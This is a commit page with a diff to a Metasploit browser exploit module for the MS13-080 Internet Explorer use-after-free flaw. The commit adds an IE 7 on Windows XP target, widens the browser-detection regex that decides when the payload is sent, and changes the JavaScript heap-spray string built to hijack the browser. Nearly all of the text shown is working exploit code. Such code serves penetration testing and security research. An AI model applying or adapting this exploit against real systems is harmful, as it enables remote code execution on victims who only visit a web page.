Add support for IE7 on XP

rapid7 · Oct 16, 2013 · 4fa3b8f · 4fa3b8f
1 parent d13fa7e
commit 4fa3b8f
Showing 1 changed file with 9 additions and 5 deletions.
diff --git a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
@@ -66,8 +66,9 @@ def initialize(info={})
       'Targets'        =>
         [
           [ 'Automatic', {} ],
+          [ 'IE 7 on Windows XP SP3', {} ],
           [ 'IE 8 on Windows XP SP3', {} ],
-          [ 'IE 8 on Windows 7',      {} ]
+          [ 'IE 8 on Windows 7',      {} ],
         ],
       'Payload'        =>
         {
@@ -121,7 +122,7 @@ def get_check_html
 }
 
 window.onload = function() {
-  window.location = "#{get_resource}/search?o=" + escape(Base64.encode(os())) + "&d=" + dll();
+  window.location = "#{get_uri.chomp("/")}/search?o=" + escape(Base64.encode(os())) + "&d=" + dll();
 }
 </script>
 </html>
@@ -208,7 +209,7 @@ def get_sploit_html(target_info)
     os         = target_info[:os]
     js_payload = ''
 
-    if os =~ /Windows (7|XP) MSIE 8\.0/
+    if os =~ /Windows (7|XP) MSIE [78]\.0/
       js_payload = Rex::Text.to_unescape(get_payload(target_info))
     else
       print_error("Target not supported by this attack.")
@@ -224,8 +225,11 @@ def get_sploit_html(target_info)
 var earth = document;
 var data = "";
 for (i=0; i<17; i++) {
-  if (i==7) { data += unescape("%u2020%u2030"); }
-  else      { data += "\\u4141\\u4141"; }
+  // IE 7
+  if (i==6)      { data += unescape("%u2020%u2030"); }
+  // IE 8/9
+  else if (i==7) { data += unescape("%u2020%u2030"); }
+  else           { data += unescape("%u4141%u4141"); }
 }
 data += "\\u4141";